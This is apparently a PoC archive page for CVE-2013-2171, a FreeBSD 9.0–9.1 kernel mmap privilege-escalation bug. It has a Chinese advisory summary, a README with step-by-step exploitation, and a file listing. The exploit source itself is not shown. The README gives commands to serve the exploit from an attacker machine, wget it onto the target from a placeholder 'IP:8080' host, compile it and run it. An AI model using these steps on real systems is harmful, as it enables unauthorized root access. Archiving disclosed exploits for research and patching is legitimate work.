CVE-2013-2171 PoC — FreeBSD 本地提权漏洞

Source

https://github.com/0xGabe/FreeBSD-9.0-9.1-Privilege-Escalation

Associated Vulnerability

Title:FreeBSD 本地提权漏洞 (CVE-2013-2171)
Description:FreeBSD是由Core Team团队负责的FreeBSD项目中的一套类Unix自由操作系统，是经过BSD、386BSD和4.4BSD发展而来的类Unix的一个重要分支。 FreeBSD 9.0至9.1-RELEASE-p4版本中的内核中的mmap实现中的sys/vm/vm_map.c文件中的‘vm_map_lookup’函数中存在漏洞，该漏洞源于程序没有正确判断任务是否具有对内存位置的访问权限。本地攻击者可通过具有读权限的应用程序利用该漏洞绕过文件系统写权限，获得特权。在目标系统运行任意代码。

Description

CVE-2013-2171

Readme

# FreeBSD-9.0-9.1 - Privilege-Escalation
CVE-2013-2171

By fbsd9lul@hunger.hu

## How to Exploit!

**1° Check the kernel version**

```
uname -a

FreeBSD freebsd 9.0-RELEASE FreeBSD 9.0-RELEASE #0: Tue Jan  3 07:46:30 UTC 2012
```

**2° Transfer this file to target**

```
Attacker machine -> python3 -m http.server 8080

Target machine -> wget IP:8080/26368.c
```

**3° Use GCC to compile the code**

```gcc 26368.c -o exploit```

**4° Run the exploit**

```./exploit```

File Snapshot


 [4.0K]  /data/pocs/c4fd5d5b6573edf763dd43f8a00fec5a3d83a7de
├── [1.6K]  26368.c
├── [1.0K]  LICENSE
└── [ 476]  README.md

0 directories, 3 files

Shenlong Bot has cached this for you

Remarks

1. It is advised to access via the original source first.

2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).

3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.

Goal Reached Thanks to every supporter — we hit 100%!